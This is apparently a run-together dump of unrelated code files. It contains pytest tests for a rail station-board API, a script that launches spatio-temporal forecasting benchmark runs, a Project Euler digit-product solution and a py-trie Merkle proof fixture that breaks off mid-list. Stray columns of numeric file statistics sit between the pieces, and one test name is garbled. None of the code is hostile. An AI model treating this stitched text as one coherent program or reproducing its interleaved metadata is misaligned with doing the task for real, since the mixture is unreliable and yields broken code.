assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
assert r.filter_type == "from"
def test_get_station_board_departures_with_details_filtered_from(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=True,
include_arrivals=False, from_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
assert r.filter_type == "from"
def test_get_station_board_arrivals_departures_with_details_filtered_from(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=True,
include_arrivals=True, from_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
assert r.filter_type == "from"
@pytest.mark.xfail
def test_get_station_board_arrivals_with_details_filtered_to(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=False,
include_arrivals=True, to_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
# TODO: Investigate why filter_type is None, not "to".
assert r.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_departures_with_details_filtered_to(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=True,
include_arrivals=False, to_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
# TODO: Investigate why filter_type is None, not "to".
assert r.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_arrivals_departures_with_details_filtered_to(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=True,
include_arrivals=True, to_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
# TODO: Investigate why filter_type is None, not "to".
assert r.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_arrivals_with_details_filtered_both_filters(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=False,
include_arrivals=True, from_filter_crs="RDG", to_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
# TODO: Investigate why filter_type is None, not "to".
assert r.filter_type == "to"
def test_get_next_departures_basic(self, session):
r = session.get_next_departures("PAD", ["RDG", "TWY"])
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
assert len(r.next_departures) == 2
assert r.next_departures[0].crs == "RDG"
assert r.next_departures[1].crs == "TWY"
def test_get_next_departures_not_a_list(self, session):
with pytest.raises(ValueError):
r = session.get_next_departures("PAD", "RDG")
def test_get_next_departures_too_few(self, session):
with pytest.raises(ValueError):
r = session.get_next_departures("PAD", [])
def test_get_next_departures_too_many(self, session):
with pytest.raises(ValueError):
r = session.get_next_departures("PAD", ["RDG", "TWY", "PLY", "PNZ", "WAT", "WIN", "BRI", "STP", "LEI", "MIM", "OXF", "CBG", "ABY", "STS", "LSK", "CSK", "GSL", "CLJ", "WIJ", "WAT", "MKC", "BIR", "BMS", "BSH", "MYB", "OPY"])
def test_get_next_departures_repeated(self, session):
r = session.get_next_departures("PAD", ["RDG", "TWY", "RDG"])
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
assert len(r.next_departures) == 3
assert r.next_departures[0].crs == "RDG"
assert r.next_departures[1].crs == "TWY"
assert r.next_departures[2].crs == "RDG"
def test_get_next_departures_with_details_basic(self, session):
r = session.get_next_departures_with_details("PAD", ["RDG", "TWY"])
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
assert len(r.next_departures) == 2
assert r.next_departures[0].crs == "RDG"
assert r.next_departures[1].crs == "TWY"
def test_get_next_departures_with_details_not_a_list(self, session):
with pytest.raises(ValueError):
r = session.get_next_departures_with_details("PAD", "RDG")
def test_get_next_departures_with_details_too_few(self, session):
with pytest.raises(ValueError):
r = session.get_next_departures_with_details("PAD", [])
def test_get_next_departures_with_details_too_many(self, session):
with pytest.raises(ValueError):
r = session.get_next_departures_with_details("PAD", ["RDG", "TWY", "PLY", "PNZ", "WAT", "WIN", "BRI", "STP", "LEI", "MIM", "OXF", "CBG", "ABY", "STS", "LSK", "CSK", "GSL", "CLJ", "WIJ", "WAT", "MKC", "BIR", "BMS", "BSH", "MYB", "OPY"])
def test_get_next_departures_with_details_repeated(self, session):
r = session.get_next_departures_with_details("PAD", ["RDG", "TWY", "RDG"])
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
assert len(r.next_departures) == 3
assert r.next_departures[0].crs == "RDG"
assert r.next_departures[1].crs == "TWY"
assert r.next_departures[2].crs == "RDG"
def test_get_fastest_departures_basic(self, session):
r = session.get_fastest_departures("PAD", ["RDG", "TWY"])
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
assert len(r.next_departures) == 2
assert r.next_departures[0].crs == "RDG"
assert r.next_departures[1].crs == "TWY"
def test_get_fastest_departures_not_a_list(self, session):
with pytest.raises(ValueError):
r = session.get_fastest_departures("PAD", "RDG")
def test_get_fastest_departures_too_few(self, session):
with pytest.raises(ValueError):
r = session.get_fastest_departures("PAD", [])
def test_get_fastest_departures_too_many(self, session):
with pytest.raises(ValueError):
r = session.get_fastest_departures("PAD", ["RDG", "TWY", "PLY", "PNZ", "WAT", "WIN", "BRI", "STP", "LEI", "MIM", "OXF", "CBG", "ABY", "STS", "LSK", "CSK", "GSL", "CLJ", "WIJ", "WAT", "MKC", "BIR", "BMS", "BSH", "MYB", "OPY"])
def test_get_next_fastestrtures_repeated(self, session):
r = session.get_fastest_departures("PAD", ["RDG", "TWY", "RDG"])
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
assert len(r.next_departures) == 3
assert r.next_departures[0].crs == "RDG"
assert r.next_departures[1].crs == "TWY"
assert r.next_departures[2].crs == "RDG"
def test_get_fastest_departures_with_details_basic(self, session):
r = session.get_fastest_departures_with_details("PAD", ["RDG", "TWY"])
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
assert len(r.next_departures) == 2
assert r.next_departures[0].crs == "RDG"
assert r.next_departures[1].crs == "TWY"
def test_get_fastest_departures_with_details_not_a_list(self, session):
with pytest.raises(ValueError):
r = session.get_fastest_departures_with_details("PAD", "RDG")
def test_get_fastest_departures_with_details_too_few(self, session):
with pytest.raises(ValueError):
r = session.get_fastest_departures_with_details("PAD", [])
def test_get_fastest_departures_with_details_too_many(self, session):
with pytest.raises(ValueError):
r = session.get_fastest_departures_with_details("PAD", ["RDG", "TWY", "PLY", "PNZ", "WAT", "WIN", "BRI", "STP", "LEI", "MIM", "OXF", "CBG", "ABY", "STS", "LSK", "CSK", "GSL", "CLJ", "WIJ", "WAT", "MKC", "BIR", "BMS", "BSH", "MYB", "OPY"])
def test_get_fastest_departures_with_details_repeated(self, session):
r = session.get_fastest_departures_with_details("PAD", ["RDG", "TWY", "RDG"])
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
assert len(r.next_departures) == 3
assert r.next_departures[0].crs == "RDG"
assert r.next_departures[1].crs == "TWY"
assert r.next_departures[2].crs == "RDG"
def test_get_service(self, session):
r = session.get_station_board("LBG", include_departures=True, include_arrivals=False)
assert len(r.train_services) > 0
s = session.get_service_details(r.train_services[0].service_id)
assert s.crs == "LBG"
def test_get_service_invalid_id(self, session):
# TODO: Wrap up SUDS errors in something more helpful in the API.
with pytest.raises(WebFault):
s = session.get_service_details("lalalalala")
| 42.384058
| 250
| 0.663418
| 2,355
| 17,547
| 4.659023
| 0.060722
| 0.102078
| 0.099526
| 0.050219
| 0.945133
| 0.9393
| 0.93447
| 0.922712
| 0.909861
| 0.900201
| 0
| 0.006075
| 0.221405
| 17,547
| 413
| 251
| 42.486683
| 0.797028
| 0.028096
| 0
| 0.707396
| 0
| 0.003215
| 0.090045
| 0
| 0
| 0
| 0
| 0.002421
| 0.546624
| 1
| 0.144695
| false
| 0
| 0.019293
| 0.003215
| 0.170418
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
68bf722715551c9c887897220a7705dce3de5ca9
| 5,890
|
py
|
Python
|
Experiments/STMeta/deprecated/Runner_supplement_external_30.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | 3
|
2021-06-29T06:18:18.000Z
|
2021-09-07T03:11:35.000Z
|
Experiments/STMeta/deprecated/Runner_supplement_external_30.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | null | null | null |
Experiments/STMeta/deprecated/Runner_supplement_external_30.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | null | null | null |
import os
import warnings
warnings.filterwarnings("ignore")
#############################################
# BenchMark emb-linear-add
#############################################
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d bike_chicago.data.yml '
'-p external_method:emb-linear-add,graph:Distance-Correlation-Interaction,mark:emb_linear_add,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d didi_chengdu.data.yml '
'-p external_method:emb-linear-add,graph:Distance-Correlation-Interaction,mark:emb_linear_add,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d metro_shanghai.data.yml '
'-p external_method:emb-linear-add,graph:Distance-Correlation-Line,mark:emb_linear_add,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d chargestation_beijing.data.yml '
'-p external_method:emb-linear-add,graph:Distance-Correlation,mark:emb_linear_add,MergeIndex:1')
#############################################
# BenchMark emb-linear-gating
#############################################
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d bike_chicago.data.yml '
'-p external_method:emb-linear-gating,graph:Distance-Correlation-Interaction,mark:emb_linear_gating,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d didi_chengdu.data.yml '
'-p external_method:emb-linear-gating,graph:Distance-Correlation-Interaction,mark:emb_linear_gating,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d metro_shanghai.data.yml '
'-p external_method:emb-linear-gating,graph:Distance-Correlation-Line,mark:emb_linear_gating,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d chargestation_beijing.data.yml '
'-p external_method:emb-linear-gating,graph:Distance-Correlation,mark:emb_linear_gating,MergeIndex:1')
#############################################
# BenchMark multi-linear-add
#############################################
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d bike_chicago.data.yml '
'-p external_method:multi-linear-add,graph:Distance-Correlation-Interaction,mark:multi_linear_add,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d didi_chengdu.data.yml '
'-p external_method:multi-linear-add,graph:Distance-Correlation-Interaction,mark:multi_linear_add,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d metro_shanghai.data.yml '
'-p external_method:multi-linear-add,graph:Distance-Correlation-Line,mark:multi_linear_add,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d chargestation_beijing.data.yml '
'-p external_method:multi-linear-add,graph:Distance-Correlation,mark:multi_linear_add,MergeIndex:1')
#############################################
# BenchMark multi-linear-gating
#############################################
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d bike_chicago.data.yml '
'-p external_method:multi-linear-gating,graph:Distance-Correlation-Interaction,mark:multi_linear_gating,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d didi_chengdu.data.yml '
'-p external_method:multi-linear-gating,graph:Distance-Correlation-Interaction,mark:multi_linear_gating,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d metro_shanghai.data.yml '
'-p external_method:multi-linear-gating,graph:Distance-Correlation-Line,mark:multi_linear_gating,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d chargestation_beijing.data.yml '
'-p external_method:multi-linear-gating,graph:Distance-Correlation,mark:multi_linear_gating,MergeIndex:1')
#############################################
# BenchMark lstm-not-concat
#############################################
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d bike_chicago.data.yml '
'-p external_lstm_len:4,external_method:lstm-not-concat,graph:Distance-Correlation-Interaction,mark:lstm4_not_concat,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d didi_chengdu.data.yml '
'-p external_lstm_len:4,external_method:lstm-not-concat,graph:Distance-Correlation-Interaction,mark:lstm4_not_concat,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d metro_shanghai.data.yml '
'-p external_lstm_len:4,external_method:lstm-not-concat,graph:Distance-Correlation-Line,mark:lstm4_not_concat,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d chargestation_beijing.data.yml '
'-p external_lstm_len:4,external_method:lstm-not-concat,graph:Distance-Correlation,mark:lstm4_not_concat,MergeIndex:1')
#############################################
# BenchMark lstm-linear-gating
#############################################
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d bike_chicago.data.yml '
'-p external_lstm_len:4,external_method:lstm-linear-gating,graph:Distance-Correlation-Interaction,mark:lstm4_linear_gating,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d didi_chengdu.data.yml '
'-p external_lstm_len:4,external_method:lstm-linear-gating,graph:Distance-Correlation-Interaction,mark:lstm4_linear_gating,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d metro_shanghai.data.yml '
'-p external_lstm_len:4,external_method:lstm-linear-gating,graph:Distance-Correlation-Line,mark:lstm4_linear_gating,MergeIndex:6')
os.system('python STMeta_Obj.py -m STMeta_v1.model.yml -d chargestation_beijing.data.yml '
'-p external_lstm_len:4,external_method:lstm-linear-gating,graph:Distance-Correlation,mark:lstm4_linear_gating,MergeIndex:1')
| 55.046729
| 147
| 0.707131
| 825
| 5,890
| 4.854545
| 0.058182
| 0.080899
| 0.083895
| 0.11985
| 0.976779
| 0.93608
| 0.9201
| 0.915106
| 0.915106
| 0.915106
| 0
| 0.011936
| 0.089643
| 5,890
| 106
| 148
| 55.566038
| 0.734987
| 0.027844
| 0
| 0.705882
| 0
| 0.470588
| 0.853833
| 0.616335
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.039216
| 0
| 0.039216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
68d9fe0fbefb5c6f1eca6bede9415f23a2f4dec3
| 1,431
|
py
|
Python
|
python/8.py
|
kstrikis/euler
|
a09cefc0762e093520f8c34aa059b618e3a62452
|
[
"Unlicense"
] | null | null | null |
python/8.py
|
kstrikis/euler
|
a09cefc0762e093520f8c34aa059b618e3a62452
|
[
"Unlicense"
] | null | null | null |
python/8.py
|
kstrikis/euler
|
a09cefc0762e093520f8c34aa059b618e3a62452
|
[
"Unlicense"
] | null | null | null |
## kstrikis' solution for project euler problem 8
## released under The Unlicense
## Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
from decimal import Decimal
number = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
lgprod = 0
for a in range(len(number)-12):
prod = 1
for b in range(13):
prod = prod * Decimal(number[a+b])
if(prod>lgprod):
lgprod = prod
print(lgprod)
| 102.214286
| 1,011
| 0.907757
| 68
| 1,431
| 19.102941
| 0.647059
| 0.020015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.756171
| 0.065688
| 1,431
| 13
| 1,012
| 110.076923
| 0.215408
| 0.140461
| 0
| 0
| 0
| 0
| 0.817661
| 0.817661
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0.1
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
68e86cd8391a48d18dbbd22ad22fae5d3abbf590
| 9,790
|
py
|
Python
|
tests/sample_proof_key_exists.py
|
unparalleled-js/py-trie
|
23e77052406836dc34b8472ddbc46430250e1750
|
[
"MIT"
] | 83
|
2017-11-27T09:22:39.000Z
|
2022-03-21T10:44:43.000Z
|
tests/sample_proof_key_exists.py
|
unparalleled-js/py-trie
|
23e77052406836dc34b8472ddbc46430250e1750
|
[
"MIT"
] | 95
|
2017-12-05T18:06:50.000Z
|
2022-03-11T03:51:18.000Z
|
tests/sample_proof_key_exists.py
|
unparalleled-js/py-trie
|
23e77052406836dc34b8472ddbc46430250e1750
|
[
"MIT"
] | 46
|
2017-11-28T16:53:17.000Z
|
2022-03-28T17:51:12.000Z
|
# flake8: NOQA: E501
# This proves that the given key (which is an account) exists on the trie rooted at this state
# root. It was obtained by querying geth via the LES protocol
state_root = b'Gu\xd8\x85\xf5/\x83:e\xf5\x9e0\x0b\xce\x86J\xcc\xe4.0\xc8#\xdaW\xb3\xbd\xd0).\x91\x17\xe8'
key = b'\x9b\xbf\xc3\x08Z\xd0\xd47\x84\xe6\xe4S4ndG|\xac\xa3\x0f^7\xd5nv\x14\x9e\x98\x84\xe7\xc2\x97'
proof = ([b'\x01\xb2\xcf/\xa7&\xef{\xec9c%\xed\xeb\x9b)\xe9n\xb5\xd5\x0e\x8c\xa9A\xc1:-{<2$)', b'\xa2\xbab\xe5J\x88\xa1\x8b\x90y\xa5yW\xd7G\x13\x16\xec\xb3\xb6\x87S9okV\xa3\rlC\xbfU', b'\xd6\x06\x92\x9e\x0b\xd310|\xbeV\x9d\xb4r\xdf0\xa5Q\xfb\xec\xb9I\x8c\x96r\x81\xeb\xefX7_l', b'\xa8\x88\xed@\x04\x7f\xa6\xbe&\x89&\x89T\t+\xac\xb8w\x8a\xebn\x16\x0c\xe1n\xb4?\xad\x14\xfdF\xff', b'\xc9\t\xd0\xaa\xb0:P\xdc\xea\xedX%\x04\x9a\xbe\x1f\x16\x0cf\xbc\x04P#@\xfd\xd60\xad\xecK\x8b\x08', b'x\xff\xb2\x9ajO\xbc\x1bjR\x80$I\xe6\x95\xf6Tow\x82\xf9\x01\xa8V\xa9\xaa4\xa6`\x88\xf9\x10', b'I\x1cQc\x8a\xeda\xf8\xd1D\x01GT)\xc9\x02O\xef\x8d\xcc\\\xf9\xe6}\x8a~\xcc\x98~\xd5\xd6\xb6', b"U'\xa2\xa0 \xe4\xb1\xb6\xc3\xcd4C_\x9c]\xb3P\xa8w\xef\x8c\xde\xc2\x02^v\xcd\x12\xed%\x89\xa5", b'(\xa6x\xfa\xbe\xc3\x9a\xae\xaa\xe9\xbcv#u\\\xdfo\x14\x9a3\xbc\x89c\xc1\xfe\xdf[{|\x02P\x03', b'\xcf5\x07\x8f3\xa9\x1f\x19Q\xbb\x11\x8a\xb0\x97\xbe\x93\xb2\xd5~\xe2\xe06\x07\xc37\x08vg\x80 BD', b'U\x8e/\x95&\n\xc5\xf1\xd4\xc3\xb9\xa84Rd\xaa\x80\xfe8\xf1\xcf G\xcc\xe3\x99\x01\x07\xceH\x9a`', b'W\x1f\xb5\x1c\xec\xf7\x0b\x86\x15\r\xf9\xf9\x94\xcd|\xe6B\x9f\xa8l\x8d]D\xf7\xba\xee:\xc0\\\x11\xb8\x08', b'\xf5i\xee)\xc4\xd24\xfc\x8f\xba\xc0vS\x1dU>\xccz\xd18\n\xa2+\n\xcf\xe2i*\xee\x18\xe8\xc1', b'\x9dmSX\x1e\xee\xf7`\x1d\x0cO\xfcF\xe4\xbd\x0cE2\x10H6\xf0\x93|\xd5z\xe7=\xebbJ\xd6', b'u\x08\x92\x08\xa5Nl\x938\x03\xa3\xe2O\xe8\xfe\xb1\xc4\x87\x8c\xb8q\x9eb\x89b\x96\x98\xd7\xf22\xb9\xa2', b'\xa6V\xb5?\xcc\xd2\xc8*ME\xe7\xcf\xf8\xad\xf8\xdb\xe7\xf8\xf6D\xd5<\x1c\x95F\x13\x0e\x06rz\xe5m', b''], [b"\xb3\x03\xa9\xc11\x87mQ\xa1I2D4jg\xfe\xd0%k\xf2\r]\xb0\x0e\xeb'\x17\xedx\xc9Uj", b'L/\r$7-\xa5\xdf x\x9c\xbc\xc4\x99\x1e\xc5\xd8\xb5\xaf\xd1\xd1\xae\xe6L\xeco\xc4\xe2RUe\r', b'\xbeSp\xf5\xef\x02\xcd\x83\xb2\x0b\xa06\xfd\xca\xbb\xed_\xf2}\xf7\xea\xb3\x84\x17\xed\xcc\x19mF\x13(\xf3', b"\xfb$IYR\x9f\x04p\x01\x1d}\x88\x0b\xed'\x8e%\x9b\xc9\xeaN_\xab\xf9\xc9\x9d\xac\xa9\xb3\t\x1eq", b'\xaab\xeb\x14\xc2\xf6}%\xaa+0\xb5\xc1\x0f< \xc5ma\xb1c\xeb\xdd\xca\xc0\x90\xe2L\x8b\xe9\xfe/', b'\x91l\x9d\xa2\x84\xbf\xc1\x05\xe2S\x0e\xc9`\xc0^}Q!\xc4ml-\xec\xf4R$\xf6\x8a\xd3\xc6\xf1j', b'\xf3\x13\xde\xe0L\xdb\x96E`Q\xdf\xa1\x13\x01b5\xe4k\xde\xde\xbf\xb10\xaf\xe61Z\xdbZ\xd47\xf4', b'\t\x81\xb0\xea*\xec\xd0\xc3\x16\xee\xed~\xdc\x98e\x90\xf2~p\xbbSY\x19\xcfl\xc4)\x01\xc2\xd9\xc91', b'-\xda%\x8a\xc5jA-\xe5 lIp\xbe\xb3h\x98\x0f\x80q\xed\xab\x89KN\xdd\xa6\xcb;\x98\xb08', b'\x13\x97\x12f\xa31\xfa}\xf1\xfe\x19\xfa\x0b\xe6\x89\x9a\xcb\xf5\xed\xf3Q\x98O=\xa3\xb0e/\xd9\x9fy\x08', b'f\xba%\xfb\xbfE\x1d]\xb3\x05\xe4$\xa5\xd2G\xecc\xe5#\x0f,\x91\x8bN9a\x8a\xd1L\x16l\xa5', b'#p\x15\x8bU\x04\x88/K|4a\xfc\x0e.Zm^{\x15uk\x8d\xe4_\xfe\xee\xae\xb99\xd1\x8e', b'C \x9f\xb3y\xf3d.\x8b\t\x1cF\x9eL\x08\x07y\x08\xb9\xe1\xffM\x87\xfd\xd6\xfd\xdb\x8f\x94\x9e\x88\xc2', b'\x17X\x1f/\x8b\x82\xf5\xe4\x02\x84}\xbe\x9bz` \x94\'"_\x9c\xff\x06\t>\x8a\xd7oK\xf9\xf5w', b'6Q\x8db\xd8\\\x84_Rin\x18\x1f\x17\x89\x7f@\xd6\xbb%>\xafa\'\x80A\xa7\xd8}d\x07"', b'\xccgm\xf7\x05\xc8\xe4G\xf4\xb3\x18\xc7\\.\x0b\xa25]\xdc\x80w\xda\xc9;\xde\x9b\x03\xa0LS\xce\x8c', b''], [b'\xe4\xd3\x15\xe0\xaa\x0f\xf9\xd0\xa6\xc2\xc8B_\xaf"0\x8c\xea;\x91\xe4E\x04\xec\x901yZ\xd6>\xadc', b'wM\xce\x16JS:\xe96\x98\x12|\xa0\xc9~G\xbb\xc7u8\xc8\x93\x9b\x05\x92yh\xaa\xda\x94NK', b'\x89\xc7\xa2\xbd\xe1\xda\x06$|\xde\x03\xd9RS\x90\x84\xe7\x05\x0cc\xdfy\xb0\xfb@\x065\xdb8\xa9\xef\x1f', b'@\x11>\xe8\xb8\x19\xb7\xc7@\x92m$\x93 \x08\xc5\x15\xbd\x97\xb0;\xf5\x05q;\xb5\xc69\xd3E\xc4\x0e', b'\xd5_ol\x05o\x8e\xf0V\xd2\xa0n\xe7CxR\xc9\x92HTQhkc\x10K\xad\xfdU\xe9\x97\x8f', b'v\x7f\xc5KB\xdaYS\xa1\xbf \xda\xe2\x99\x84\xef,\x92\xdd\xc9\xb8\x9eo\xfcv(\x95\xff\x94t\xbc5', b"\xcbQ\x962!$\x1f\xdc\xdb\xfe\xef'\xc8\xc8O\xec\xa2\xae\xd3P\x88\xbf\xbd!\xea\x0e\xb0\x89\xe9\xdd\xf3w", b'H\xb8\x1b\xc3&\x86|!o\x003/\xc7K\xc9+,K\xe1y\xf2\x86\xa9*H\x05W\xcd\xf8\x8b\xb5\n', b'\x06\xc5\xa1\x83\xe4\xb4\xdc\xbf\xc0\x8c4Q\x93\x14W\xaf\xbb\xe9f\x82\xa2\x8d\xa3m\xda\xed\xc0W\x88UA\xd9', b'\x9czV\x7f$\xa8\xb9\xf3\xc1W0\x19\xac\xc5\xaap\x03?*\xe6\xd6\xee<\x0b\xafr\xf6ji\xd9\x87\xed', b'\xc7\x1d\xca\x95\xab~\xd3|\xa6\x9f\xba\x9e\xd5KxI\x95Y\xadx\xb8\xda\xa7!\xba\x93\xbbB,\x97n\xe4', b'\xd7"\x13\xca=\xa9|e\x11\x8f%\xb2^\x1b\xa6\xff\x93Z\x8b(\xca\xab\x12\xed\x8b3\x0f\xe0\xa7U\xa9\xe1', b'\xc2\xb4\x98\xb7\x08\x18#i7\x81\x85\xfd\xc3\xc6k\x12\x86\x99\xa55\x0c8\xd3\xbc\x9d\xc8\xe0\xd3\xcd=\xc6x', b'\xad\xf0\xea&\xf4\x8f=5\xe1\xb5b\xc1}\xba\xa1\n \xa4\xb7J2\x1f\xd7\xc9\x1d\xa4\xc2\xaf\xb7O\xb2\x12', b'\xd5~\x94\x99~Vy,4\xedMJ\x1a\xda3\xe7\x90\x91\xd4\xafw\xba\xbf\x89`\x0e\x99s\x93E\xdf%', b'\x82\xd2O\x16\xca{\x15\x87\xef-\x8a\xea\xb9\xcd\xfc\x82\x84\x99\xdco\xc1\x1eg\xf3-\x07\xf8\xa3\xed\xffx\x85', b''], [b"\xc5\xa5\xd38zu\xfc\xe9\xe2j\x97\xf0\x81T$\xee5\x94AC\xb1\x85\x0c\xef\x10\xcb`Z\xfcT'\xcb", b'ZU\xe4?lj\x05\xf8\xbc\xa7\xf1\xe4\xdb\x08M\x06\xad\xbf\xb3s\xfa\xcaS\xb9{U\xd2n\x981+|', b'l\x0cL\xfb\\(g\xb47\xc2<\xcb\x14\xf3\xa9l\x01#\xdb"|\xdc\xfd\xa0#\xa2\x89\xcfx\x97\xb4\x8e', b'\x0b\xe7$\x1d\xa2\x1c\\\xa5)t\xd6\x82\xec\xed\x02]\xdd\xefz\xa3C`\x1b\xda\x81\t\xb3\x14\xdf5\xbb\xcb', b'\xe7%b2\xd4\xc6\x98\x90\xd8:B\xa4\x9e\n\xc6\xa1\x01\xac\x94\xbdr\xca\xdd\x8a\xa8\xe8\xc6F\xed\x04\xe9\x14', b'\xa7\xac\xc0S\xcbo\x98\xebJ)\xb1\x8b{\xda,\x98\xf2M\xca,\xcd\xc4%\x94\xe4\xdc<\xf5o}\x90\x1d', b'[\xd9}F\xe2\n\x84\xbc\xa0\x81\x0f\xb9\x0b]\x0c\x10%\x9d\r\x00RZgbV*2b\xd1z\xb5\xd3', b'\xac\xcag\xdb\xc3y\x91\x82\xddu\xad\x85%g\x82\xa0\r\xf4\x99^=\x14h\xee\xac\x81/o\xe6\xe4\xec\x0c', b'8\xeb\xed\x80}2\xd9.\x0e\xeb\x92\xa7\xae\xeb\x8d\x9b>8<\x9d\xc4\x05\xf2W;F\xce!\t\x15\xb2\xe3', b'*\xed\xbfJ\x80\x9f7\xd1\xcd\xeft\x89.e\x02M\r\x85D-\x9bL\x8d\xac*3h\xf3\x9f\xde\xe0F', b'd\xf9\xdf\xfb\xfa`\x97:\x11\xc4\x89u_\xe9&\xd0LX;r\x12\x86\\,}\x7f:\xbc\xf9\x9a\xd2\xe9', b'\x94\x80\xd4\xb8\xe4\xa6\xd4\x9cS\xcc\xc7*xo]2y~\xd6\x18a\xfb\xafP\x19\x87\xe7:\xb1r\x96\xdc', 